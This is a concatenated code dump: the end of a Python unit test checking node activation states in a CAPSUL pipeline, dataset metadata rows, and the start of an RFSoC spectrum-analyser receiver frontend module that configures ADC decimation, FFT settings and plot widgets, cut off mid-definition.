'pipeline_100.threshold_lt_10': {
'_activated': False,
'_enabled': False,
},
'pipeline_100.threshold_lt_100': {
'_activated': False,
'_enabled': False,
},
'pipeline_100.mask_1': {
'_activated': False,
'_enabled': True,
},
'pipeline_100.mask_10': {
'_activated': True,
'_enabled': True,
},
'pipeline_100.mask_100': {
'_activated': False,
'_enabled': True,
},
'select_threshold': {
'_activated': True,
'_enabled': True,
},
'identity_a': {
'_activated': True,
'_enabled': True,
},
'identity_b': {
'_activated': True,
'_enabled': True,
},
'identity_c': {
'_activated': True,
'_enabled': True,
},
}
),
({'select_threshold': 'threshold_10',
'select_method': 'lower than'},
{
'': {
'_activated': True,
'_enabled': True,
},
'first_pipeline': {
'_activated': True,
'_enabled': True,
},
'first_pipeline.threshold_lt_1': {
'_activated': True,
'_enabled': True,
},
'first_pipeline.threshold_lt_10': {
'_activated': True,
'_enabled': True,
},
'first_pipeline.threshold_lt_100': {
'_activated': True,
'_enabled': True,
},
'first_pipeline.threshold_gt_1': {
'_activated': False,
'_enabled': False,
},
'first_pipeline.threshold_gt_10': {
'_activated': False,
'_enabled': False,
},
'first_pipeline.threshold_gt_100': {
'_activated': False,
'_enabled': False,
},
'first_pipeline.mask_1': {
'_activated': True,
'_enabled': True,
},
'first_pipeline.mask_10': {
'_activated': True,
'_enabled': True,
},
'first_pipeline.mask_100': {
'_activated': True,
'_enabled': True,
},
'pipeline_1': {
'_activated': True,
'_enabled': True,
},
'pipeline_1.threshold_lt_1': {
'_activated': False,
'_enabled': True,
},
'pipeline_1.threshold_lt_10': {
'_activated': True,
'_enabled': True,
},
'pipeline_1.threshold_lt_100': {
'_activated': False,
'_enabled': True,
},
'pipeline_1.threshold_gt_1': {
'_activated': False,
'_enabled': False,
},
'pipeline_1.threshold_gt_10': {
'_activated': False,
'_enabled': False,
},
'pipeline_1.threshold_gt_100': {
'_activated': False,
'_enabled': False,
},
'pipeline_1.mask_1': {
'_activated': False,
'_enabled': True,
},
'pipeline_1.mask_10': {
'_activated': True,
'_enabled': True,
},
'pipeline_1.mask_100': {
'_activated': False,
'_enabled': True,
},
'pipeline_10': {
'_activated': True,
'_enabled': True,
},
'pipeline_10.threshold_lt_1': {
'_activated': False,
'_enabled': True,
},
'pipeline_10.threshold_lt_10': {
'_activated': True,
'_enabled': True,
},
'pipeline_10.threshold_lt_100': {
'_activated': False,
'_enabled': True,
},
'pipeline_10.threshold_gt_1': {
'_activated': False,
'_enabled': False,
},
'pipeline_10.threshold_gt_10': {
'_activated': False,
'_enabled': False,
},
'pipeline_10.threshold_gt_100': {
'_activated': False,
'_enabled': False,
},
'pipeline_10.mask_1': {
'_activated': False,
'_enabled': True,
},
'pipeline_10.mask_10': {
'_activated': True,
'_enabled': True,
},
'pipeline_10.mask_100': {
'_activated': False,
'_enabled': True,
},
'pipeline_100': {
'_activated': True,
'_enabled': True,
},
'pipeline_100.threshold_lt_1': {
'_activated': False,
'_enabled': True,
},
'pipeline_100.threshold_lt_10': {
'_activated': True,
'_enabled': True,
},
'pipeline_100.threshold_lt_100': {
'_activated': False,
'_enabled': True,
},
'pipeline_100.threshold_gt_1': {
'_activated': False,
'_enabled': False,
},
'pipeline_100.threshold_gt_10': {
'_activated': False,
'_enabled': False,
},
'pipeline_100.threshold_gt_100': {
'_activated': False,
'_enabled': False,
},
'pipeline_100.mask_1': {
'_activated': False,
'_enabled': True,
},
'pipeline_100.mask_10': {
'_activated': True,
'_enabled': True,
},
'pipeline_100.mask_100': {
'_activated': False,
'_enabled': True,
},
'select_threshold': {
'_activated': True,
'_enabled': True,
},
'identity_a': {
'_activated': True,
'_enabled': True,
},
'identity_b': {
'_activated': True,
'_enabled': True,
},
'identity_c': {
'_activated': True,
'_enabled': True,
},
}
),
]
    def test_activations(self):
        """For each (kwargs, expectations) pair in expected_status, build a
        ComplexPipeline with those parameters and verify every listed node's
        'activated' and 'enabled' flags.

        Node names are dotted paths: 'a.b.c' descends through sub-pipelines
        a then b to node c; the empty name '' denotes the main pipeline node.
        """
        for kwargs, activations_to_check in self.expected_status:
            pipeline = get_process_instance(ComplexPipeline, **kwargs)
            for full_node_name, node_activations in six.iteritems(activations_to_check):
                # Walk down the sub-pipeline chain named by the dotted prefix.
                split = full_node_name.split('.')
                node_pipeline = pipeline
                for i in split[:-1]:
                    node_pipeline = node_pipeline.nodes[i].process
                node_name = split[-1]
                try:
                    node = node_pipeline.nodes[node_name]
                except KeyError:
                    raise KeyError('Pipeline {0} has no node named {1}'.format(node_pipeline.pipeline, node_name))
                try:
                    # 'what' tracks the flag being checked so the re-raised
                    # AssertionError below can name it.
                    what = 'activation of node {0}'.format(full_node_name or 'main pipeline node')
                    expected = node_activations.get('_activated')
                    if expected is not None:
                        got = node.activated
                        self.assertEqual(expected, got)
                    what = 'enabled for node {0}'.format(full_node_name or 'main pipeline node')
                    expected = node_activations.get('_enabled')
                    if expected is not None:
                        got = node.enabled
                        self.assertEqual(expected, got)
                except AssertionError:
                    # Re-raise with full context: which parameters, which flag,
                    # expected vs. actual value.
                    raise AssertionError('Wrong activation within ComplexPipeline with parameters {0}: {1} is supposed to be {2} but is {3}'.format(kwargs, what, expected, got))
def test():
    """Run the TestComplexPipeline suite with a verbose text runner.

    Returns:
        bool: True when every test in the suite passed.
    """
    loader = unittest.TestLoader()
    runner = unittest.TextTestRunner(verbosity=2)
    result = runner.run(loader.loadTestsFromTestCase(TestComplexPipeline))
    return result.wasSuccessful()
if __name__ == '__main__':
    # Run the unit tests first; the optional '-v' flag then opens a GUI
    # view of the pipeline for manual inspection.
    print('Test return code:', test())
    if '-v' in sys.argv[1:]:
        from pprint import pprint
        pipeline = get_process_instance(ComplexPipeline)
        # Qt-related imports are deferred so plain test runs need no GUI stack.
        from soma.qt_gui.qt_backend import QtGui
        from capsul.qt_gui.widgets import PipelineDeveloperView
        #from capsul.qt_gui.widgets.activation_inspector import ActivationInspectorApp
        #app = ActivationInspectorApp(ComplexPipeline)
        app = QtGui.QApplication(sys.argv)
        view = PipelineDeveloperView(pipeline, allow_open_controller=True, show_sub_pipelines=True)
        view.show()
        app.exec_()
        # NOTE(review): presumably releases the view before interpreter
        # shutdown to avoid Qt teardown ordering problems — confirm.
        del view
| 39.462389
| 173
| 0.3613
| 2,228
| 35,674
| 5.324506
| 0.075404
| 0.122397
| 0.16994
| 0.16994
| 0.812695
| 0.787996
| 0.780578
| 0.772823
| 0.684228
| 0.655568
| 0
| 0.045184
| 0.543393
| 35,674
| 903
| 174
| 39.506091
| 0.683099
| 0.008297
| 0
| 0.658768
| 0
| 0.001185
| 0.260053
| 0.117923
| 0
| 0
| 0
| 0
| 0.004739
| 1
| 0.003555
| false
| 0
| 0.015403
| 0
| 0.027251
| 0.003555
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
36e961b14e2a2d0ff60c8ae3a895c07593dbf956
| 109,596
|
py
|
Python
|
rfsoc_sam/receiver_frontend.py
|
schelleg/rfsoc_sam
|
2a4ae0fc1686d1e3146cbea5d8578c7432910b92
|
[
"BSD-3-Clause"
] | null | null | null |
rfsoc_sam/receiver_frontend.py
|
schelleg/rfsoc_sam
|
2a4ae0fc1686d1e3146cbea5d8578c7432910b92
|
[
"BSD-3-Clause"
] | null | null | null |
rfsoc_sam/receiver_frontend.py
|
schelleg/rfsoc_sam
|
2a4ae0fc1686d1e3146cbea5d8578c7432910b92
|
[
"BSD-3-Clause"
] | null | null | null |
__author__ = "David Northcote"
__organisation__ = "The Univeristy of Strathclyde"
__support__ = "https://github.com/strath-sdr/rfsoc_sam"
import numpy as np
import ipywidgets as ipw
import plotly.graph_objs as go
import matplotlib.colors as mcolors
import time
from .spectrum_analyser import SpectrumAnalyser
from .bandwidth_selector import BandwidthSelector
from .quick_widgets import FloatText, IntText, Button, Accordion, DropDown, Label, Image, CheckBox, QuickButton
# Names of the spur/alias/image products tracked for the receiver's digital
# down-conversion chain (aliases, Nyquist images, harmonics, PLL mixing
# products, interleaving and offset spurs).
# NOTE(review): exact semantics of each entry come from the RF data
# converter documentation — verify before relying on ordering.
DDC_SPURS = ['rx_alias', 'rx_image', 'nyquist_up', 'nyquist_down',
             'hd2', 'hd2_image', 'hd3', 'hd3_image',
             'pll_mix_up', 'pll_mix_up_image', 'pll_mix_down', 'pll_mix_down_image',
             'tis_spur', 'tis_spur_image', 'offset_spur', 'offset_spur_image']
class RadioOfdmAnalyser():
def __init__(self,
adc_tile,
adc_block,
adc_description,
spectrum_analyser,
ofdm_receiver,
decimator,
inspector):
self._tile = adc_tile
self._block = adc_block
self._spectrum_analyser = spectrum_analyser
self._decimator = decimator
self._ofdm_receiver = ofdm_receiver
self._inspector = inspector
self._adc_description = adc_description
self._ofdm_receiver.reset_synchronisation()
@property
def constellation_enable(self):
if self._inspector.stopped:
return False
else:
return True
@constellation_enable.setter
def constellation_enable(self, enable):
if enable:
self._inspector.start()
else:
self._inspector.stop()
@property
def centre_frequency(self):
return abs(self._block.MixerSettings['Freq'])
@centre_frequency.setter
def centre_frequency(self, centre_frequency):
nyquist_zone = int(np.ceil(centre_frequency/(self._block.BlockStatus['SamplingFreq']*1e3/2)))
if nyquist_zone == 0:
nyquist_zone = 1
if nyquist_zone != self._block.NyquistZone:
self._block.NyquistZone = nyquist_zone
if (nyquist_zone % 2) == 0:
self._block.MixerSettings['Freq'] = centre_frequency
else:
self._block.MixerSettings['Freq'] = -centre_frequency
self._spectrum_analyser.centre_frequency = centre_frequency*1e6
self._block.UpdateEvent(1)
@property
def decimation_factor(self):
if self._decimator.decimation_factor > 0:
return self._block.DecimationFactor * self._decimator.decimation_factor
else:
return self._block.DecimationFactor
@decimation_factor.setter
def decimation_factor(self, decimation_factor):
word_lut = [8, 4, 2]
sel = int(np.log2(decimation_factor))
if decimation_factor in [2, 4, 8]:
self._block.DecimationFactor = decimation_factor
self._block.FabRdVldWords = word_lut[sel-1]
self._spectrum_analyser.ssr_packetsize = 0
self._spectrum_analyser.ssr_mode = 4-sel
self._safe_restart()
self._decimator.decimation_factor = 0
self._spectrum_analyser.sample_frequency = self._block.BlockStatus['SamplingFreq']*1e9
self._spectrum_analyser.decimation_factor = decimation_factor
self._spectrum_analyser.ssr_packetsize = int(self._spectrum_analyser.fft_size/8)
elif decimation_factor in [16, 32, 64, 128, 256, 512, 1024, 2048]:
self._block.DecimationFactor = 8
self._block.FabRdVldWords = 2
self._spectrum_analyser.ssr_packetsize = 0
self._spectrum_analyser.ssr_mode = 0
self._safe_restart()
self._decimator.decimation_factor = int(decimation_factor/8)
self._spectrum_analyser.sample_frequency = self._block.BlockStatus['SamplingFreq']*1e9
self._spectrum_analyser.decimation_factor = decimation_factor
self._spectrum_analyser.ssr_packetsize = int(self._spectrum_analyser.fft_size/8)
@property
def number_frames(self):
return self._spectrum_analyser.plot.data_windowsize
@number_frames.setter
def number_frames(self, number_frames):
if number_frames in range(1, 65):
self._spectrum_analyser.plot.data_windowsize = int(number_frames)
@property
def sample_frequency(self):
return self._block.BlockStatus['SamplingFreq']*1e9
@property
def calibration_mode(self):
return self._block.CalibrationMode
@calibration_mode.setter
def calibration_mode(self, calibration_mode):
if calibration_mode in [1, 2]:
self._block.CalibrationMode = calibration_mode
self._safe_restart()
@property
def nyquist_stopband(self):
return self._spectrum_analyser.nyquist_stopband * 100
@nyquist_stopband.setter
def nyquist_stopband(self, nyquist_stopband):
self._spectrum_analyser.nyquist_stopband = nyquist_stopband/100
@property
def fftsize(self):
return self._spectrum_analyser.fft_size
@fftsize.setter
def fftsize(self, fftsize):
self._spectrum_analyser.fft_size = fftsize
@property
def spectrum_type(self):
return self._spectrum_analyser.spectrum_type
@spectrum_type.setter
def spectrum_type(self, spectrum_type):
self._spectrum_analyser.spectrum_type = spectrum_type
@property
def spectrum_units(self):
return self._spectrum_analyser.spectrum_units
@spectrum_units.setter
def spectrum_units(self, spectrum_units):
self._spectrum_analyser.spectrum_units = spectrum_units
@property
def window(self):
return self._spectrum_analyser.window
@window.setter
def window(self, window_type):
self._spectrum_analyser.window = window_type
@property
def spectrum_window(self):
return self._spectrum_analyser.spectrum_window
@property
def height(self):
return self._spectrum_analyser.height
@height.setter
def height(self, height):
self._spectrum_analyser.height = height
@property
def width(self):
return self._spectrum_analyser.width
@width.setter
def width(self, width):
self._spectrum_analyser.width = width
@property
def spectrum_enable(self):
return self._spectrum_analyser.plot.enable_updates
@spectrum_enable.setter
def spectrum_enable(self, enable):
if enable:
self._spectrum_analyser.plot.enable_updates = True
else:
self._spectrum_analyser.plot.enable_updates = False
@property
def waterfall_enable(self):
return self._spectrum_analyser.spectrogram.enable_updates
@waterfall_enable.setter
def waterfall_enable(self, enable):
if enable:
self._spectrum_analyser.spectrogram.enable_updates = True
else:
self._spectrum_analyser.spectrogram.enable_updates = False
@property
def dma_enable(self):
return self._spectrum_analyser.dma_enable
@dma_enable.setter
def dma_enable(self, enable):
if enable:
self._spectrum_analyser.dma_enable = 1
self._spectrum_analyser.timer.start()
else:
self._spectrum_analyser.timer.stop()
self._spectrum_analyser.dma_enable = 0
@property
def update_frequency(self):
return self._spectrum_analyser.update_frequency
@update_frequency.setter
def update_frequency(self, update_frequency):
self._spectrum_analyser.update_frequency = update_frequency
@property
def plotly_theme(self):
return self._spectrum_analyser.plotly_theme
@plotly_theme.setter
def plotly_theme(self, plotly_theme):
self._spectrum_analyser.plotly_theme = plotly_theme
self._inspector._c_plot._plot.layout.template = plotly_theme
@property
def line_colour(self):
return self._spectrum_analyser.line_colour
@line_colour.setter
def line_colour(self, line_colour):
self._spectrum_analyser.line_colour = line_colour
@property
def line_fill(self):
return self._spectrum_analyser.line_fill
@line_fill.setter
def line_fill(self, line_fill):
self._spectrum_analyser.line_fill = line_fill
@property
def zmin(self):
return self._spectrum_analyser.zmin
@zmin.setter
def zmin(self, zmin):
self._spectrum_analyser.zmin = zmin
@property
def zmax(self):
return self._spectrum_analyser.zmax
@zmax.setter
def zmax(self, zmax):
self._spectrum_analyser.zmax = zmax
@property
def quality(self):
return self._spectrum_analyser.quality
@quality.setter
def quality(self, quality):
self._spectrum_analyser.quality = quality
@property
def post_process(self):
return self._spectrum_analyser.plot.post_process
@post_process.setter
def post_process(self, post_process):
if post_process in ['max', 'min', 'average', 'median']:
self._spectrum_analyser.plot.post_process = post_process
else:
self._spectrum_analyser.plot.post_process = 'none'
@property
def display_max(self):
return self._spectrum_analyser.plot.display_max
@display_max.setter
def display_max(self, display_max):
self._spectrum_analyser.plot.display_max = display_max
@property
def display_min(self):
return self._spectrum_analyser.plot.display_min
@display_min.setter
def display_min(self, display_min):
self._spectrum_analyser.plot.display_min = display_min
@property
def number_max_indices(self):
return self._spectrum_analyser.plot.number_max_indices
@number_max_indices.setter
def number_max_indices(self, number_max_indices):
self._spectrum_analyser.plot.number_max_indices = number_max_indices
@property
def colour_map(self):
return self._spectrum_analyser.spectrogram.cmap
@colour_map.setter
def colour_map(self, colour_map):
self._spectrum_analyser.spectrogram.cmap = colour_map
@property
def spectrogram_performance(self):
return self._spectrum_analyser.spectrogram.ypixel
@spectrogram_performance.setter
def spectrogram_performance(self, performance):
self._spectrum_analyser.spectrogram.ypixel = performance
@property
def ymin(self):
return self._spectrum_analyser.plot.yrange[0]
@ymin.setter
def ymin(self, ymin):
temp_range = list(self._spectrum_analyser.plot.yrange)
temp_range[0] = ymin
self._spectrum_analyser.plot.yrange = tuple(temp_range)
@property
def ymax(self):
return self._spectrum_analyser.plot.yrange[1]
@ymax.setter
def ymax(self, ymax):
temp_range = list(self._spectrum_analyser.plot.yrange)
temp_range[1] = ymax
self._spectrum_analyser.plot.yrange = tuple(temp_range)
@property
def number_min_indices(self):
return self._spectrum_analyser.plot.number_min_indices
@number_min_indices.setter
def number_min_indices(self, number_min_indices):
self._spectrum_analyser.plot.number_min_indices = number_min_indices
@property
def display_ddc_plan(self):
return self._spectrum_analyser.plot.display_ddc_plan
@display_ddc_plan.setter
def display_ddc_plan(self, display_ddc_plan):
self._spectrum_analyser.plot.display_ddc_plan = display_ddc_plan
@property
def ddc_centre_frequency(self):
return self._spectrum_analyser.plot.ddc_centre_frequency*1e-6
@ddc_centre_frequency.setter
def ddc_centre_frequency(self, ddc_centre_frequency):
self._spectrum_analyser.plot.ddc_centre_frequency = ddc_centre_frequency*1e6
self._spectrum_analyser.plot.update_ddc_plan()
@property
def ddc_plan_hd2_db(self):
return self._spectrum_analyser.plot.ddc_plan.hd2_db
@ddc_plan_hd2_db.setter
def ddc_plan_hd2_db(self, hd2_db):
self._spectrum_analyser.plot.ddc_plan.hd2_db = hd2_db
self._spectrum_analyser.plot.update_ddc_plan()
@property
def ddc_plan_hd3_db(self):
return self._spectrum_analyser.plot.ddc_plan.hd3_db
@ddc_plan_hd3_db.setter
def ddc_plan_hd3_db(self, hd3_db):
self._spectrum_analyser.plot.ddc_plan.hd3_db = hd3_db
self._spectrum_analyser.plot.update_ddc_plan()
@property
def ddc_plan_nsd_db(self):
return self._spectrum_analyser.plot.ddc_plan.nsd_db
@ddc_plan_nsd_db.setter
def ddc_plan_nsd_db(self, nsd_db):
self._spectrum_analyser.plot.ddc_plan.nsd_db = nsd_db
self._spectrum_analyser.plot.update_ddc_plan()
@property
def ddc_plan_pll_mix_db(self):
return self._spectrum_analyser.plot.ddc_plan.pll_mix_db
@ddc_plan_pll_mix_db.setter
def ddc_plan_pll_mix_db(self, pll_mix_db):
self._spectrum_analyser.plot.ddc_plan.pll_mix_db = pll_mix_db
self._spectrum_analyser.plot.update_ddc_plan()
@property
def ddc_plan_off_spur_db(self):
return self._spectrum_analyser.plot.ddc_plan.off_spur_db
@ddc_plan_off_spur_db.setter
def ddc_plan_off_spur_db(self, off_spur_db):
self._spectrum_analyser.plot.ddc_plan.off_spur_db = off_spur_db
self._spectrum_analyser.plot.update_ddc_plan()
@property
def ddc_plan_tis_spur_db(self):
return self._spectrum_analyser.plot.ddc_plan.tis_spur_db
@ddc_plan_tis_spur_db.setter
def ddc_plan_tis_spur_db(self, tis_spur_db):
self._spectrum_analyser.plot.ddc_plan.tis_spur_db = tis_spur_db
self._spectrum_analyser.plot.update_ddc_plan()
@property
def dma_status(self):
return self._spectrum_analyser.dma_status
def spectrum(self):
return self._spectrum_analyser.plot.get_plot()
def waterfall(self):
return self._spectrum_analyser.spectrogram.get_plot()
def reset_ofdm_receiver(self):
self._ofdm_receiver.reset_synchronisation()
    def _safe_restart(self):
        """Shut down and power the ADC tile back up, blocking until each
        transition is reported complete by the tile status registers.

        NOTE(review): both polling loops spin indefinitely if the tile never
        changes state -- no timeout is applied.
        """
        tile_number = self._adc_description[0]
        # Request shutdown and wait for the tile to report powered-down.
        self._tile.ShutDown()
        running = self._tile._parent.IPStatus['ADCTileStatus'][tile_number]['PowerUpState']
        while running:
            time.sleep(0.1)
            running = self._tile._parent.IPStatus['ADCTileStatus'][tile_number]['PowerUpState']
        # Power back up and wait until the tile reports running again.
        self._tile.StartUp()
        running = self._tile._parent.IPStatus['ADCTileStatus'][tile_number]['PowerUpState']
        while not running:
            time.sleep(0.1)
            running = self._tile._parent.IPStatus['ADCTileStatus'][tile_number]['PowerUpState']
#_freq_planner_props = [("enable_rx_alias"),
# ("enable_rx_image"),
# ("enable_nyquist_up"),
# ("enable_nyquist_down"),
# ("enable_hd2"),
# ("enable_hd2_image"),
# ("enable_hd3"),
# ("enable_hd3_image"),
# ("enable_pll_mix_up"),
# ("enable_pll_mix_up_image"),
# ("enable_pll_mix_down"),
# ("enable_pll_mix_down_image"),
# ("enable_tis_spur"),
# ("enable_tis_spur_image"),
# ("enable_offset_spur"),
# ("enable_offset_spur_image")]
#_freq_planner_desc = [("RX Alias"),
# ("RX Image"),
# ("Nyquist Up"),
# ("Nyquist Down"),
# ("HD2"),
# ("HD2 Image"),
# ("HD3"),
# ("HD3 Image"),
# ("PLL Mix Up"),
# ("PLL Mix Up Image"),
# ("PLL Mix Down"),
# ("PLL Mix Down Image"),
# ("TIS Spur"),
# ("TIS Spur Image"),
# ("Offset Spur"),
# ("Offset Spur Image")]
# Names of the frequency-planner toggle properties attached to
# RadioOfdmAnalyser below, and the matching human-readable labels used by
# the GUI checkboxes. The two lists are index-aligned.
_freq_planner_props = ['enable_rx_alias',
                       'enable_rx_image',
                       'enable_hd2',
                       'enable_hd2_image',
                       'enable_hd3',
                       'enable_hd3_image',
                       'enable_pll_mix_up',
                       'enable_pll_mix_up_image',
                       'enable_pll_mix_down',
                       'enable_pll_mix_down_image']
_freq_planner_desc = ['Fc',
                      'Fc Image',
                      'HD2',
                      'HD2 Image',
                      'HD3',
                      'HD3 Image',
                      'PLL Mix Up',
                      'PLL Mix Up Image',
                      'PLL Mix Down',
                      'PLL Mix Down Image']
def _create_mmio_property(idx):
    """Build a property that reads/toggles entry *idx* of the plot's
    DDC-plan display list, refreshing the overlay whenever it is written."""
    def _get(self):
        return self._spectrum_analyser.plot.display_ddc_plan[idx]

    def _set(self, value):
        # Normalise any truthy/falsy input to a strict boolean.
        self._spectrum_analyser.plot.display_ddc_plan[idx] = bool(value)
        self._spectrum_analyser.plot.update_ddc_plan()

    return property(_get, _set)
# Attach one display-toggle property per frequency-planner entry to
# RadioOfdmAnalyser (e.g. 'enable_rx_alias'); each property indexes the
# corresponding slot of the plot's display_ddc_plan list.
for idx, name in enumerate(_freq_planner_props):
    setattr(RadioOfdmAnalyser, name, _create_mmio_property(idx))
class RadioOfdmAnalyserGUI():
    def __init__(self,
                 adc_tile,
                 adc_block,
                 adc_description,
                 spectrum_analyser,
                 decimator,
                 ofdm_receiver,
                 inspector):
        """Build the widget-based frontend around a RadioOfdmAnalyser.

        Args:
            adc_tile: RF-ADC tile driver for the receive channel.
            adc_block: RF-ADC block driver within that tile.
            adc_description: ADC descriptor; index 0 selects the tile's
                status entry during safe restarts.
            spectrum_analyser: spectrum analyser core wrapper.
            decimator: soft decimator core wrapper.
            ofdm_receiver: OFDM receiver core wrapper.
            inspector: constellation inspector used for the OFDM plots.
        """
        self._widgets = {}
        self._accordions = {}
        # Guards against re-entrant frontend refreshes while a previous
        # update is still draining the queue.
        self._running_update = False
        self._update_que = []
        self._stopped = False
        # Plot enable states remembered across stop()/start() cycles.
        self._runtime_status = {'spectrum_enable' : False, 'waterfall_enable' : False}
        self._inspector = inspector
        self.analyser = RadioOfdmAnalyser(adc_tile=adc_tile,
                                          adc_block=adc_block,
                                          adc_description=adc_description,
                                          spectrum_analyser=spectrum_analyser,
                                          decimator=decimator,
                                          ofdm_receiver=ofdm_receiver,
                                          inspector=self._inspector)
        # Master configuration; keys map 1:1 onto analyser properties and
        # widget dict_ids.
        self._config = {'centre_frequency' : 819,
                        'nyquist_stopband' : 80,
                        'decimation_factor' : self.analyser.decimation_factor,
                        'calibration_mode' : self.analyser.calibration_mode,
                        'fftsize' : 2048,
                        'spectrum_type' : self.analyser.spectrum_type,
                        'spectrum_units' : self.analyser.spectrum_units,
                        'window' : 'hanning',
                        'height' : self.analyser.height,
                        'spectrum_enable' : self.analyser.spectrum_enable,
                        'waterfall_enable' : self.analyser.waterfall_enable,
                        'constellation_enable' : self.analyser.constellation_enable,
                        'dma_enable' : self.analyser.dma_enable,
                        'update_frequency' : 10,
                        'plotly_theme' : self.analyser.plotly_theme,
                        'line_colour' : self.analyser.line_colour,
                        'zmin' : self.analyser.zmin,
                        'zmax' : self.analyser.zmax,
                        'quality' : self.analyser.quality,
                        'width' : self.analyser.width,
                        'post_process' : 'average',
                        'number_frames' : 6,
                        'display_max' : False,
                        'display_min' : False,
                        'number_max_indices' : 1,
                        'number_min_indices' : 1,
                        'colour_map' : self.analyser.colour_map,
                        'spectrogram_performance' : 4,
                        'ymin' : self.analyser.ymin,
                        'ymax' : self.analyser.ymax,
                        'enable_rx_alias' : False,
                        'enable_rx_image' : False,
                        'enable_hd2' : False,
                        'enable_hd2_image' : False,
                        'enable_hd3' : False,
                        'enable_hd3_image' : False,
                        'enable_pll_mix_up' : False,
                        'enable_pll_mix_up_image' : False,
                        'enable_pll_mix_down' : False,
                        'enable_pll_mix_down_image' : False,
                        'ddc_centre_frequency' : 0,
                        'ddc_plan_hd2_db' : self.analyser.ddc_plan_hd2_db,
                        'ddc_plan_hd3_db' : self.analyser.ddc_plan_hd3_db,
                        'ddc_plan_nsd_db' : self.analyser.ddc_plan_nsd_db,
                        'ddc_plan_pll_mix_db' : self.analyser.ddc_plan_pll_mix_db,
                        'ddc_plan_off_spur_db' : self.analyser.ddc_plan_off_spur_db,
                        'ddc_plan_tis_spur_db' : self.analyser.ddc_plan_tis_spur_db}
        self._initialise_frontend()
@property
def config(self):
return self._config
@config.setter
def config(self, config_dict):
self._update_config(config_dict)
def start(self):
self.config = {'spectrum_enable' : self._runtime_status['spectrum_enable'],
'waterfall_enable' : self._runtime_status['waterfall_enable']}
self._stopped = False
def stop(self):
if not self._stopped:
self._runtime_status.update({'spectrum_enable' : self._config['spectrum_enable'],
'waterfall_enable' : self._config['waterfall_enable']})
self.config = {'spectrum_enable' : False,
'waterfall_enable' : False}
self._stopped = True
    def _initialise_frontend(self):
        """Create every control widget, the window-preview plot and the
        accordion containers, then push the initial configuration to both
        the hardware and the widgets via _update_config()."""
        # --- Frequency-planner numeric entries ---------------------------
        self._widgets.update({'ddc_centre_frequency' :
                              FloatText(callback=self._update_config,
                                        value=self._config['ddc_centre_frequency'],
                                        min_value=0,
                                        max_value=self.analyser._block.BlockStatus['SamplingFreq']*1e3,
                                        step=1,
                                        dict_id='ddc_centre_frequency',
                                        description='Centre Frequency (MHz):')})
        self._widgets.update({'ddc_plan_hd2_db' :
                              FloatText(callback=self._update_config,
                                        value=self._config['ddc_plan_hd2_db'],
                                        min_value=-300,
                                        max_value=300,
                                        step=1,
                                        dict_id='ddc_plan_hd2_db',
                                        description='HD2 (dB)')})
        self._widgets.update({'ddc_plan_hd3_db' :
                              FloatText(callback=self._update_config,
                                        value=self._config['ddc_plan_hd3_db'],
                                        min_value=-300,
                                        max_value=300,
                                        step=1,
                                        dict_id='ddc_plan_hd3_db',
                                        description='HD3 (dB)')})
        self._widgets.update({'ddc_plan_nsd_db' :
                              FloatText(callback=self._update_config,
                                        value=self._config['ddc_plan_nsd_db'],
                                        min_value=-300,
                                        max_value=300,
                                        step=1,
                                        dict_id='ddc_plan_nsd_db',
                                        description='NSD (dBFs/Hz)')})
        self._widgets.update({'ddc_plan_pll_mix_db' :
                              FloatText(callback=self._update_config,
                                        value=self._config['ddc_plan_pll_mix_db'],
                                        min_value=-300,
                                        max_value=300,
                                        step=1,
                                        dict_id='ddc_plan_pll_mix_db',
                                        description='PLL Ref Mixing (dB)')})
        self._widgets.update({'ddc_plan_off_spur_db' :
                              FloatText(callback=self._update_config,
                                        value=self._config['ddc_plan_off_spur_db'],
                                        min_value=-300,
                                        max_value=300,
                                        step=1,
                                        dict_id='ddc_plan_off_spur_db',
                                        description='Offset Spur (dB)')})
        self._widgets.update({'ddc_plan_tis_spur_db' :
                              FloatText(callback=self._update_config,
                                        value=self._config['ddc_plan_tis_spur_db'],
                                        min_value=-300,
                                        max_value=300,
                                        step=1,
                                        dict_id='ddc_plan_tis_spur_db',
                                        description='TI Spur (dB)')})
        # One checkbox per frequency-planner overlay toggle.
        for idx, freq_prop in enumerate(_freq_planner_props):
            self._widgets.update({freq_prop :
                                  CheckBox(callback=self._update_config,
                                           description=_freq_planner_desc[idx],
                                           value=self._config[freq_prop],
                                           indent=False,
                                           layout_width='150px',
                                           dict_id=freq_prop)})
        # --- Drop-down selectors -----------------------------------------
        self._widgets.update({'decimation_factor' :
                              DropDown(callback=self._update_config,
                                       options=[2, 4, 8, 16, 32, 64, 128, 256, 512, 1024, 2048],
                                       value=self._config['decimation_factor'],
                                       dict_id='decimation_factor',
                                       description='Decimation Factor:')})
        self._widgets.update({'spectrum_type' :
                              DropDown(callback=self._update_config,
                                       options=[('Power Spectrum'),
                                                ('Power Spectral Density')],
                                       value=self._config['spectrum_type'],
                                       dict_id='spectrum_type',
                                       description='Spectrum Type:',
                                       description_width='100px')})
        self._widgets.update({'spectrum_units' :
                              DropDown(callback=self._update_config,
                                       options=[('dBW'),
                                                ('dBm')],
                                       value=self._config['spectrum_units'],
                                       dict_id='spectrum_units',
                                       description='Spectrum Units:',
                                       description_width='100px')})
        self._widgets.update({'post_process' :
                              DropDown(callback=self._update_config,
                                       options=[('None', 'none'),
                                                ('Maximum Hold', 'max'),
                                                ('Minimum Hold', 'min'),
                                                ('Running Average', 'average'),
                                                ('Running Median', 'median')],
                                       value=self._config['post_process'],
                                       dict_id='post_process',
                                       description='Post Processing:',
                                       description_width='100px')})
        self._widgets.update({'fftsize' :
                              DropDown(callback=self._update_config,
                                       options=[64, 128, 256, 512, 1024, 2048, 4096, 8192],
                                       value=4096,
                                       dict_id='fftsize',
                                       description = 'FFT Size:')})
        self._widgets.update({'calibration_mode' :
                              DropDown(callback=self._update_config,
                                       options=[('1 (Fs/2 ≤ ±30%)', 1),
                                                ('2 (Fs/2 > ±30%)', 2)],
                                       value=self._config['calibration_mode'],
                                       dict_id='calibration_mode',
                                       description='Calibration Mode:')})
        self._widgets.update({'window' :
                              DropDown(callback=self._update_config,
                                       options=[('Rectangular', 'rectangular'),
                                                ('Bartlett', 'bartlett'),
                                                ('Blackman', 'blackman'),
                                                ('Hamming', 'hamming'),
                                                ('Hanning', 'hanning')],
                                       value='rectangular',
                                       dict_id='window',
                                       description='')})
        self._widgets.update({'plotly_theme' :
